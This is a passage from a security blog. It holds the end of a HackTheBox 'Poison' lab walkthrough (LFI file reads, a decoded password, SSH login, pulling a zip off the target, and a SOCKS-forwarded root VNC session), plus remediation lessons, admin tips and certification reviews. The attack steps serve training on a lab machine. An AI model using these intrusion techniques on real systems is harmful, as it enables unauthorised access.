    └──╼ $echo "m0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=" | base64 -d 
    �L�
       �^UV��Q��֑��������ђ�ؑ�▒L�LU���Ԍ��U▒▒U\U�\�U�^T�ՕB���▒�Y[�U�]▒��\▒T���ՙ
    ���▒VU��Z�X��Ռ�Օ�Qѕ[���T�LR]��Q�▒������^XQ��Q������Ւ������U���▒LV����ґVV�U���[��Q��]Ֆ����М���Ֆ�U���Q��֚�U�����U�Ӎ▒֚��Q�֑���R�U��▒T�U�֑�������QTZ���Z��U��̓�U���
     ]U▒��U�T�Z�����▒�����
    VUV�Ռ                 TL�^��T����ԌT���]���
    ����▒���U����Ԓ▒�MZT�L����U�^۔�����[\�T��՛��
             V��U��TZ����������V�Z���֑����[\�X[T^�[Z����V��Ց��]��VL����U^T����������L\Q��V��֕�U��T[Q��L�]���Q���▒������┌
    
    
    

    No joy there, let’s use a bash one-liner to try 13 lots of base64 decoding instead.

    └──╼ **$**data=$(cat encoded); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data 
    Charix!2#4%6&8(0
    

    That works, and we have the password - just in case, well try to ssh as root, but this won’t work.

    Lets go back to the app…

    We’ve established that if we pass the name of a text file to it the data is simply included, so can we try an LFI?

    Yes, we can - grabbing /etc/passwd provides us with a user list.

    Note that again I’m using view source here to clean up the file and make it easy to read :)

    It makes sense that the charix password is probably for that user so we’ll give that a go!

    └──╼ **$**ssh charix@poison.htb 
    (charix@poison.htb) Password for charix@Poison: 
    Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4 
    FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 
    
    Welcome to FreeBSD! 
    
    Release Notes, Errata: https://www.FreeBSD.org/releases/ 
    Security Advisories:  https://www.FreeBSD.org/security/ 
    FreeBSD Handbook:    https://www.FreeBSD.org/handbook/ 
    FreeBSD FAQ:      https://www.FreeBSD.org/faq/ 
    Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ 
    FreeBSD Forums:     https://forums.FreeBSD.org/ 
    
    Documents installed with the system are in the /usr/local/share/doc/freebsd/ 
    directory, or can be installed later with:  pkg install en-freebsd-doc 
    For other languages, replace "en" with a language code like de or fr. 
    
    Show the version of FreeBSD installed:  freebsd-version ; uname -a 
    Please include that output and any error messages when posting questions. 
    Introduction to manual pages:  man man 
    FreeBSD directory layout:    man hier 
    
    Edit /etc/motd to change this login announcement. 
    To see how long it takes a command to run, type the word "time" before the 
    command name. 
             -- Dru <genesis@istar.ca> 
    charix@Poison:~ % 
    

    And we’re in. As a side note, when I was doing this box ssh was very slow to come back with a login prompt -give it a minute, it will get there.

    Escalation to root

    Within charix’s home directory, we find a “secret.zip”, we’ll start with this since it seems like the obvious way forward. Firstly let’s get it on to our attack box. There’s no python3 on this box, but thankfully we do have Python 2, and I can just about remember how to start the server module!

    charix@Poison:~ % python -m SimpleHTTPServer 9000 
    Serving HTTP on 0.0.0.0 port 9000 ... 
    10.10.14.24 - - [03/Feb/2024 10:32:49] "GET /secret.zip HTTP/1.1" 200 -
    

    Back on my machine…

    wget poison.htb:9000/secret.zip 
    --2024-02-03 09:32:49--  http://poison.htb:9000/secret.zip 
    Resolving poison.htb (poison.htb)... 10.129.6.248 
    Connecting to poison.htb (poison.htb)|10.129.6.248|:9000... connected. 
    HTTP request sent, awaiting response... 200 OK 
    Length: 166 [application/zip] 
    Saving to: ‘secret.zip’ 
    
    secret.zip                   100%[====================================================================================================>]   166  --.-KB/s   in 0s    
    
    2024-02-03 09:32:49 (9.04 MB/s) - ‘secret.zip’ saved [166/166]
    
    
    

    The zip file is password protected - we could try to crack it, but charix has kindly reused their password so we can easily gain access with what we already have.

    └──╼ $unzip secret.zip 
    Archive:  secret.zip
    [secret.zip] secret password: 
     extracting: secret  
    

    The ZIP contains a singly binary file, we’ll need to find something to use it for…

    Back to the target box then, and by far the most difficult aspect for me is working out how to use commands on FreeBSD - it’s similar enough that I basically know my way around, but most of the flags are different! After some clumsy enumeration and finally figuring out how to use netstat on this system, we can see there are a few services listening on localhost.

    charix@Poison:~ % netstat -an -p tcp 
    Active Internet connections (including servers) 
    Proto Recv-Q Send-Q Local Address      Foreign Address     (state) 
    tcp4    0    0 10.129.6.248.22     10.10.14.24.59344    ESTABLISHED 
    tcp4    0    0 127.0.0.1.25      *.*           LISTEN 
    tcp4    0    0 *.80          *.*           LISTEN 
    tcp6    0    0 *.80          *.*           LISTEN 
    tcp4    0    0 *.22          *.*           LISTEN 
    tcp6    0    0 *.22          *.*           LISTEN 
    tcp4    0    0 127.0.0.1.5801     *.*           LISTEN 
    tcp4    0    0 127.0.0.1.5901     *.*           LISTEN 
    charix@Poison:~ % 
    

    5801 and 5901 are both VNC ports, which are used for remote desktop access. If we have VNC running locally, can we forward it to our box using ssh?

    Thankfully PS works normally in BSD land so let’s quickly check who the process is running as:

    charix@Poison:~ % ps -aux | grep vnc 
    root  614  0.0  1.0  25724  9680 v0- I   09:36   0:00.10 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 1200 
    charix 983  0.0  0.0   412  328  2  R+  10:55   0:00.00 grep vnc
    

    Root! - Well that’s promising - VNC can use a binary file to perform cookie-based authentication - safe bet that’s what the secret file from the zip file is. Let’s give this a go…

    I have my proxychains socks5 proxy running on port 5000, so firstly, we’ll need to ssh port forward, and then a new terminal tab we can use proxychains to try to connect to VNC.

    [ProxyList] 
    \# add proxy here ... 
    \# meanwile 
    \# defaults set to "tor" 
    socks5  127.0.0.1 5000 
    \#socks5  127.0.0.1 5001
    
    ssh charix@poison.htb -D 5000
    
    proxychains vncviewer 127.0.0.1:5901 -passwd secret
    

    And indeed, this works a charm, up pops my NVC viewer, root session and all.

    Success, we owned the box!

    Alternative path

    I ran out of time for this after completing the box, but after checking out a few other writeups I can see that it was also possible to gain a shell on the box using a log poisoning attack (I guess this was the intended route, since the box is called poison!). You can try that approach yourself if you like :)

    Avoiding the Hack - Lessons learned

    So what can we learn from this box? (other than the fact flags are weird in BSD). Firstly we have a publicly exposed testing application - this might seem like a contrived situation for HackTheBox, but in fact, this is surprisingly common. The fix is simple - any system which is going into a production state for any reason should be thoroughly validated against a pre-determined baseline, if a port, service, or application isn’t on the approved list, it shouldn’t be on a production instance. At the very least, regular system scanning should pick up on issues like these, but it’s far preferable to properly validate before deployment!

    The application itself suffers from an LFI vulnerability which again isn’t all that surprising for a test application. Avoiding an LFI issue can be achieved by implementing strict input validation mechanisms to sanitise user inputs, and better yet avoiding user inputs in file paths whenever possible. If you have to use file inclusion, it’s a good idea to whitelist files, specifying allowed directories and files instead of using dynamic user-supplied input directly. On the system itself, enforcing proper access controls and least privilege principles, ensuring that the web server or application has the minimum required permissions to access files and directories can help to avoid critical or sensitive files from being disclosed. Both SE-Linux and Apparmour are a good way to achieve this kind of coverage without having to implement it manually.

    Within the password backup file, it’s clear to see that 13 iterations of base64 encoding isn’t truly any sort of protection - certainly, without the hint it would have taken longer to work out, however, whichever way you look at it encoding is never more than obfuscation, and security by obscurity is never enough to rely on alone!

    As is often the case, there’s password reuse on the zip file within the charix user’s home directory - this is another issue which is much more common than you might think. Users are often concerned about losing access to data if they forget a password, but there are better ways to manage this than re-using your system password. All this really means is that if an attacker is able to compromise your account, they can also access your “password-protected” files. Keep in mind too that this works the other way around - if you send out a password-protected zip file which is subsequently cracked, there’s a reasonable chance that the password for the zip file is also a user account password!

    Finally, the VNC application running as root is an issue - as a rule, any interactive services shouldn’t run as root if at all possible. Of all the vulnerabilities on this machine, this one is the most likely to have a genuine reason to exist. Nonetheless, there’s almost always a better way to approach a problem than leaving an interactive process running as root.

    See you in the next one! :)

Stuff I've learned

Latest Tips ( all )

  • Tips

    I recently ran into another interesting “bug” (I sure do seem to find a lot of them) although this one, to be fair, is more of a quirk than an actual error.

    As I often seem to need to do at the moment, I was spinning up a new Ubuntu instance in VirtualBox. VirtualBox v7 has a fancy new feature called “Unattended Installation” which I hadn’t previously either noticed or had cause to use. I thought I’d give it a try and found that it did, indeed, set my system up using the credentials that it asked me for, and even installed the Guest Tools. What’s not to love?

    Well, how about the fact that on booting I’m not root and have no idea of the root password. No problem - let’s sudo su… and no, password prompt. sudo -s? No, password prompt. sudo [the command I wanted to run] - password prompt. Shoot. I’ve no idea what the root password is. It turns out that VirtualBox 7’s “Unattended Installation” does not put your initial userid into the sudo group - instead, it sets the root (uid=0) password to the same password as the initial id (uid=1000).

    The solution is therefore to run su - and use the password you specified when kicking off the installation. Then add your user to sudoers with usermod -a -G sudo [username].

    This is a really weird way of going about this - VirtualBox, if you’re reading - Love the unattended installation option, don’t love this setup!

  • Tips

    After upgrading an Ubuntu machine to 20.10, I ran into an interesting error - although the upgrade was successful, the system in question still seemed to think it was running the previous version of Ubuntu - Running lsb_release gives me the following, still showing the old version form which I just upgraded:

    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.04
    Release:        23.04
    Codename:       lunar
    

    I was not able to find a solid explanation as to exactly why this happened! My best guess is that one or more of the base files were modified (by me) and therefore were not updated during the upgrade. The solution was to reinstall the base-files package, which contains /etc/lsb_release

    duck@server:~$ sudo apt reinstall base-files
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following package was automatically installed and is no longer required:
      wmdocker
    Use 'sudo apt autoremove' to remove it.
    The following packages will be upgraded:
      base-files
    1 upgraded, 0 newly installed, 0 to remove and 5 not upgraded.
    Need to get 73.8 kB of archives.
    After this operation, 26.6 kB of additional disk space will be used.
    Get:1 http://im.archive.ubuntu.com/ubuntu mantic-updates/main amd64 base-files amd64 13ubuntu2.1 [73.8 kB]
    Fetched 73.8 kB in 1s (92.4 kB/s)   
    (Reading database ... 199351 files and directories currently installed.)
    Preparing to unpack .../base-files_13ubuntu2.1_amd64.deb ...
    Unpacking base-files (13ubuntu2.1) over (12.3ubuntu2.1) ...
    Setting up base-files (13ubuntu2.1) ...
    Installing new version of config file /etc/debian_version ...
    Installing new version of config file /etc/issue.net ...
    motd-news.service is a disabled or a static unit not running, not starting it.
    Processing triggers for plymouth-theme-ubuntu-text (22.02.122-3ubuntu2) ...
    update-initramfs: deferring update (trigger activated)
    Processing triggers for install-info (7.0.3-2) ...
    Processing triggers for man-db (2.11.2-3) ...
    Processing triggers for initramfs-tools (0.142ubuntu15.1) ...
    update-initramfs: Generating /boot/initrd.img-6.5.0-14-generic
    
    
    

    Now, uname -a and lsb_release -a both display correctly.

    duck@server:~$ uname -a
    Linux server 6.5.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 14 14:59:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
    
    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.10
    Release:        23.10
    Codename:       mantic
    

    Hopefully, this helps someone!

  • Tips

    As a part of creating training material, or perhaps making a vulnerable machine for a CTF, I often need to enable MySQL root access with a password, and often a poor password which you should never * use in a production environment! Doing this on Ubuntu has become a bit more tricky (although really that’s a good thing) but it’s also something I need to do often enough that I forget the correct way to do it on an up-to-date system!

    By default Ubuntu does not configure the MySQL root account to authenticate with a password - rather, you access a new installation by running either sudo mysql or spawning a root shell and just running mysql. Incidentally, this approach also breaks the mysql_secure_installation script which is worth running for a production environment as it does pretty much what it says on the tin! Once you’ve access the root account, the ‘normal’ approach most people take to changing the password (and this is the error I usually make) is to run:

    ALTER USER 'root'@'localhost' IDENTIFIED BY 'password';
    

    And while this command will work, it won’t give you access on Ubuntu, since you also need to allow the root user to access mysql via password - therefore, we need to run:

    sudo mysql
    

    Then the following ALTER USER command to change the password and set the root user’s authentication method to one that uses a password. The following example changes the authentication method to mysql_native_password:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
    

    After making this change, exit the MySQL prompt:

    exit
    

    Following that, you can run the mysql_secure_installation script without any errors, or if you’re making a vulnerable / training system, you can now login with

    mysql -u root -p
    

    If you’d like to revert to the default setting on Ubuntu (perhaps after running mysql_secure_installation) simply use the command:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH auth_socket;
    
  • Tips

    If you’ve tried to install a Python package using pip install recently, and you’re running Debian 12 (or a derivative like Parrot 6 in my case) you may have been stumped by this error message:

    error: externally-managed-environment
    
    × This environment is externally managed
    ╰─> To install Python packages system-wide, try apt install
        python3-xyz, where xyz is the package you are trying to
        install.
    
        If you wish to install a non-Debian-packaged Python package,
        create a virtual environment using python3 -m venv path/to/venv.
        Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
        sure you have python3-full installed.
    
        If you wish to install a non-Debian packaged Python application,
        it may be easiest to use pipx install xyz, which will manage a
        virtual environment for you. Make sure you have pipx installed.
    
        See /usr/share/doc/python3.11/README.venv for more information.
    
    note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
    hint: See PEP 668 for the detailed specification.
    

    What’s going on here? Essentially, the externally-managed-environment error occurs when the system package manager (so apt, in this case) is managing Python packages, as a result, pip is not allowed (by default) to interfere with Python packages. If we take a look at the Python enhancement proposal PEP 668 we can see that the objective of this change is essentially to prevent users from unintentionally modifying packages which are required by the distribution and breaking stuff. Actually, this is a pretty good idea - however, it can be a pain if you’d rather run the risk and continue to use pip with reckless abandon like I would.

    It’s worth pointing out that if you’re managing a production system, you really should follow the advice given and try to install your required package using apt to get the version which is supported in your Distro’s repository - simply run sudo apt install python3-[desired package]. Again, if you need a non-supported package using a venv is the best way to go

    If, however, you want to be reckless, you have two options..

    Option 1 - Break system packages

    The error message says you can pass in the flag --break-system-packages and you can do exactly that - this won’t deliberately break system packages, rather it’s just overriding the protection which has been introduced and doing what pip always used to do. It might break some system packages though - it kinda told you that :)

    If using a venv is more effort than you want to put in (pipx does make this quite easy!) a good halfway house would be to try getting the package from apt first, and then use --break-system-packages if the package isn’t present in the repo.

    Option 2 - Delete EXTERNALLY-MANAGED

    For a longer-term solution which will totally disable this message, you can delete the EXTERNALLY-MANAGED file in your system Python installation:

    sudo rm -rf /usr/lib/python3.11/EXTERNALLY-MANAGED
    

    This will totally disable the protection though, so use with care. Python 3.11 is current as I’m writing this but by the time you read it, that directory might be different based on the current version.

Things that don't go in one of the other categories

Other Stuff ( all )

  • Other

    May 18, 2024 by Ducksec

    CompTIA SecurityX

    Last week I was invited by CompTIA to take the new SecurityX beta - so why not! I already have the CASP+, so this is a great opportunity to refresh knowledge and learn some new things - all for $50! The new eXpert series from ComTIA will eventually feature three exams, DataX, SecurityX and CloudNetX. According to Comptia:

    CompTIA Advanced Security Practitioner (CASP+) is the expert version of CompTIA Security+ and will be re-branded to SecurityX , with the next exam version. This name change will not affect the status of current CASP+ certification holders and those with an active CASP+ certification will receive a SecurityX certification. The certification will continue to:

    • Validate job tasks performed by a security professional with 10 years of IT experience and 5 years of security experience
    • Be designed around the tasks performed by senior security engineer and security architect roles
    • Be a natural progression from the job roles aligned to Security+

    I’ll be updating this blog as I make better notes on the changes between the old a new syllabi but for now let’s dive in with some initial impressions.

    So what’s changed?

    As usual there’s some general updates to ensure the certification aligns with the newest approaches and tools, but there’s also some larger shifts in the core areas of focus. My overall impression is that the SecurityX (CAS-005) specification places a stronger emphasis on proactive and advanced security measures which are more suitable for todays hyper connected environments, whilst adding some key new areas, such as AI security.

    For example, CompTIA have included objectives covering the adoption of zero trust architecture, cloud access security brokers (CASBs), and the integration of AI in security operations. An increased emphasis on automated security processes, including Security Orchestration, Automation, and Response (SOAR), and advanced cryptographic concepts like homomorphic encryption and post-quantum cryptography, also suggest a shift towards more sophisticated and automated security frameworks.

    In some places, familiar topics have been somewhat deepened and modernised - the inclusion of topics like continuous integration/continuous deployment (CI/CD) and advanced application security testing reflects the growing importance of secure software development practices, and an expanded approach to risk management is evident in sections covering supply chain risk management, formal methods for software security, and the introduction of Software Bill of Materials (SBoM).

    Here’s a quick summary of what’s changed - if you’re planning to take the beta, hopefully this helps you to focus in on what you may need to put some extra study into!

    Quick summary of Changes between CASP+ (CAS-004) and SecurityX (CAS-005)

    Firstly, the certification Domains have been re-named and modified:

    CASP+ (CAS-004) Domains

    1. Security Architecture
    2. Security Operations
    3. Security Engineering
    4. Security Governance, Risk, and Compliance

    SecurityX (CAS-005) Domains

    1. Governance, Risk and Compliance
    2. Security Architecture
    3. Security Engineering
    4. Security Operations

    As you might expect there’s some new topics in each section - for now, here’s a quick rundown of items which jumped out at me:

    New Topics in and areas of focus in SecurityX (CAS-005)

    1. Governance, Risk and Compliance
      • Supply Chain Risk Management
      • Updated GRC frameworks (DMA, COPPA etc.)
      • Focus on AI Security challenges
    2. Security Architecture
      • Zero Trust Architecture
      • Cloud Access Security Broker (CASB)
      • Integration of AI in Security
      • Software-Defined Networking (SDN)
      • Secure Access Service Edge (SASE)
      • Formal Methods for Software Security
      • Software Bill of Materials (SBoM)
      • Greater focus on APIs
    3. Security Engineering
      • Advanced Cryptographic Concepts
      • Specialised systems (IoT / OT)
      • Authenticated Encryption with Associated Data (AEAD)
      • TOML (Toms Obvious, Minimal Language)
      • Blockchain and Immutable Databases
      • Use of Post-Quantum Cryptography (PQC)
      • Virtualised technologies (eg vTPM)
    4. Security Operations
      • Greater focus on automation
      • Rita and Sigma (Rule based languages)

    I will update this post with more analysis as I start my studying!

  • Other

    Introduction

    Last year I enjoyed completing the AWS Solutions Architect Associate exam - so what better way to kick off 2024 than by taking on the Security specialism?!

    Certification Overview

    The AWS Certified Security - Specialty certification is a popular accreditation offered by Amazon Web Services (AWS) that, according to AWS “validates your expertise in creating and implementing security solutions in the AWS Cloud. This certification also validates understanding of specialised data classifications and AWS data protection mechanisms; data-encryption methods and AWS mechanisms to implement them; and secure internet protocols and AWS mechanisms to implement them.”.

    At the outset, it’s worth being clear that this is very much an AWS security certification - not a security certification with AWS as the focus. By this I mean that if you don’t already have a solid grounding in security principles don’t expect to master them by pursuing this certification, rather, take this certification to see how those principles apply in AWS specifically.

    AWS recommend that “AWS Certified Security - Specialty is intended for experienced individuals who have five years of IT security experience in designing and implementing security solutions and two or more years of hands-on experience in securing AWS workloads.” - my sense is that 5 years of security experience may be a bit overkill - the general security knowledge level required is probably on a par with Security+ - but the two years hands on with AWS isn’t. While the certification certainly covers many of the familiar services you know and love, it does tend to focus on more usual situations, edge cases and nuanced applications which you probably won’t be familiar with unless you’ve used the platform for a while.

    Exam Details

    • Exam Title: AWS Certified Security - Specialty

    • Exam Code: SCS-CO2

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 750 (on a scale of 100-1000)

    Exam Domains

    According to the specification, the AWS Security Specialist certification exam is divided into the following key domains:

    • Domain 1: Threat Detection and Incident Response (14% of scored content)
    • Domain 2: Security Logging and Monitoring (18% of scored content)
    • Domain 3: Infrastructure Security (20% of scored content)
    • Domain 4: Identity and Access Management (16% of scored content)
    • Domain 5: Data Protection (18% of scored content)
    • Domain 6: Management and Security Governance (14% of scored content)

    Like my last AWS exam, I felt that this was an accurate representation of the actual question split on the exam - although Logging and Monitoring felt a bit heavier than 18% on my specific exam.

    Study Resources

    As I’ve mentioned in previous reviews, AWS does provide a good variety of resources to help you study for the exam - on top of this there are some excellent third-party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d spend some time getting to know these for all the named security products on the exam. This is far from the most fun way to study, but many of the actual exam questions felt like they were lifted right from the documentation.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Official Practice Questions: AWS offer a free official practice exam (20 questions), find it on the exam information page, or through Skill Builder.
    • Official Practice Exam - Available as part of the skill builder subscription, last time, for Solutions Architect Associate, I thought that the practice exam was a great representation of the actual test - this time, not quite so much!
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You’ll want to ensure you have cost management in place before labbing much for this exam as many of the security services can be quite expensive!

    Preparation Tips

    Like many higher-level exams, this one seemed to focus quite heavily on nuances and edge cases, so don’t fall into the trap of concentrating only on the features which you’d most commonly use. I’d also be very familiar with services such as CloudFront, CloudWatch, CloudTrail and Security Hub which will certainly appear on the exam, but can also show up as part of a broader or more complex question.

    Much more annoyingly, AWS seem to have fallen into the trap of making their higher-level exam questions “harder” by producing incredibly long, overly wordy, intentionally confusing (perhaps a little bit harsh there..) questions which take forever to unpick. In actual fact (and here’s the key on the exam) much of this fluff makes very little difference to the answer to the question, but you’ll want to practice spotting keywords and phrases being used and mentally preparing yourself for an awful lot of reading and re-reading before you sit the real thing. Seriously, I like to study - I read a lot and I take more exams than is probably normal for a human being, but halfway through this exam I was exhausted with trying to wade through these questions!

    While studying, remember to pay attention to the relative cost of services, as well as their complexity and ease of use - a fair few of the exam questions will ask for the “most cost-effective” or “least effort” solution.

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward, all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score, or even a pass/fail after the exam itself. There’s speculation online that you only don’t receive a pass/fail after the exam if you have provisionally passed, but I can’t confirm if that’s 100% true - it was in my case, I got my pass notification about 10 hours after the exam (which was quicker than last time!). I must admit I’m not a fan of this - one assumes that AWS are reviewing exam recordings for signs of cheating - but isn’t that rather the function of the Pearson Vue proctor? Either way be ready for an additional wait after the exam itself.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review, this time round I used the feature to bookmark questions I was too tired of reading over!

    One real positive for this exam was that AWS seem to have decided to avoid questions involving double negatives, or those “select the option which does NOT” type answers, which I always find extra confusing for no real benefit. A new feature was the ability to change the colour of the exam interface - I hope this is going to apply to all Pearson Vue exams going forward as I found it quite nice to change the colours from time to time. I still finished with a massive headache, but there you go. The exam time was plenty - there’s no practical simulations, just straight multiple-choice.

    Should I get this certification?

    As a Security specialist, I wanted to get this certification, and if you work with AWS regularly it would certainly be a good thing to do! I firmly believe that getting as many people certified in security as possible is one of the best ways to improve our collective defence against all kinds of threats, and if AWS is your thing this is a good way to go. If, however, you have little background in, or knowledge of, security, I feel this would be a very difficult certification to begin with. Even if you do work with AWS regularly, but don’t have your security fundamentals down it might pay dividends to start with something more general (like Security+) before taking on the AWS Security Specialist. For what it’s worth, I studied for about 2 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time and had a security background - I’d double that if you’re approaching it without much Security knowledge under your belt.

    Conclusion

    Studying for and taking the AWS Certified Security Specialist certification on was enjoyable and rewarding, even if the exam was a bit of a slog. The certification is a valuable and in-demand credential that demonstrates your skills in securing AWS infrastructure and services but, to be fair, it won’t make a massive contribution to your knowledge of Security outside of the AWS platform (then again, it isn’t really supposed to!).

  • Other

    Introduction

    Having completed several other certifications with eLearn Security (Now INE Security) I decided to challenge myself with the most difficult certification currently on offer in the offensive security path, the eWPTX. The exam was… “fiddly” - overall definitely one of the harder certifications I’ve gone for, however a lot of this was for all the wrong reasons. We’ll get to that shortly!

    Certification Overview

    According to INE “The eWPTX is our most advanced web application pentesting certification. The exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass.”

    By the specification, the exam tests:

    • Penetration testing processes and methodologies
    • Web application analysis and inspection
    • Advanced Reporting skills and Remediation
    • Advanced knowledge and abilities to bypass basics advanced XSS, SQLi, etc. filters
    • Advanced knowledge of different Database Management Systems
    • Ability to create custom exploits when modern tools fail

    INE offer formal training for this certification as part of their subscription service - I didn’t have access to this, but I’ve heard a lot of positive comments about the training experience. If you already have an INE subscription with access you’re in a great spot!

    In terms of structure, the eWPTX is similar to other INE Security exams - spin up your exam environment, conduct a pentest and present a commercial grade report. Meet all the listed criteria and write a professional report and you pass. For the eWPTX, there are several key “milestone” objectives which must be completed in order to pass, in addition to which you must find and report additional vulnerabilities not specifically listed in the letter of engagement.

    Study Resources

    Since I didn’t have access to the official course from INE, I used a combination of other resources to prepare around the topics which were listed for the exam, the most important ones included:

    • HackTheBox: At this point, HTB has content which can serve as training for almost any hacking exam! I spent time focusing on machines (usually with writeups to check my work) which featured typical web attacks (SQLi, SSTI, XXE, XSS, SSRF, CSRF etc.)

    • Vulnhub: Much less important to me these days since I find spinning up a box via HTB much easier, however, vuln hub boxes are still an excellent way to focus on the core attacks mentioned above

    • Portswigger Web Security Academy: From the folks who bring you Burpsuite, the Web Security Academy is well worth working through, and a great way to get more practice with Burp.

    Preparation Tips

    Without giving too much away, it’s fair to say that this exam is hard - however, it’s hard because it’s “fiddly”, not because the exploits are especially unusual or exotic. Therefore, if you have a good grasp of SQLi, SSTI, XXE, XSS, SSRF, CSRF etc. you have a good start. You will want to make use of automated tools on the exam (there’s no weird restrictions a ‘la OSCP) so do be sure to have plenty of practice with them too. Burpsuite or OWASP Zap is a must - you’ll also want to be comfortable with common web attack tools like SQLmap and Dirbuster (or similar).

    A big aspect of preparing for this one is the psychological game - I read quite a number of reviews up front and took on board that there may well be some instability in the environment as well as some exploits which needed firing a few times to work. What I didn’t really understand was that this meant that some payloads would work literally only once, then requiring a complete reset of the environment - this threw me on the exam and in a few places I was only able to move forward through throwing the same exploit again and again out of sheer frustration!

    Therefore, have uppermost in your mind:

    If you think you have found a vulnerability, and it looks exploitable IT SHOULD BE. There are no “rabbit holes” on this exam, so if it’s not working, just keep resetting the environment and re-sending the exploit until it works.

    Exam Experience

    As you may have sensed, I had a few issues with the exam experience - as many others have reported elsewhere.

    Let’s begin at the beginning - the process of getting a voucher, activating the exam and downloading the letter of engagement was all fine. As with all INE Security certifications, you can start this one whenever you like via the dashboard. The dashboard also allows you to generate a VPN config file and reset, stop and start your exam environment. This all worked fine and was a nice smooth experience.

    The lab itself - not quite so smooth! During previous INE Security certifications, I have experienced varying levels of connectivity problems - specifically the VPN would seem to randomly disconnect with the target hosts becoming unreachable, often without any actual error output from OpenVPN. The eWPTX was not terrible for this - but it wasn’t great either. I experienced one or two disconnects on most days, usually just requiring a restart of the OpenVPN process, but sometimes needing a lab reset. Overall manageable enough for the context, but certainly room for improvement.

    The biggest issue then - by far - was the instability of the critical exploits needed to pass the exam. As mentioned above, the exam is structured in such a way that besides the usual work of finding and documenting vulnerabilities you also must exploit certain paths. The major issue for this exam is that these essential exploits seem to behave erratically and inconsistently. Payloads that I confirmed to work on one try would often not work again - sometimes after an environment reset, they wouldn’t work at all. This leads to a situation where a candidate can be using exactly the right payload, but not actually getting a response - at the very least this is unfair and in my opinion, INE really need to address this. I think it’s fair to say that if I hadn’t already looked at a good number of reviews and prepared myself for a lot of issues with the “critical” exploits I would have given up!

    More broadly (and unlike other INE Security certifications) this one felt much more like a CTF than a pentest - personally that’s not my favourite “feel” to an exam - but it’s not excessive. The scenario feels contrived, but not ridiculous and there’s enough general context to make writing a sensible report more than doable. The flip side is that practising for the exam using HTB or similar CTF platforms is probably more applicable than it otherwise might be!

    Should I get this certification?

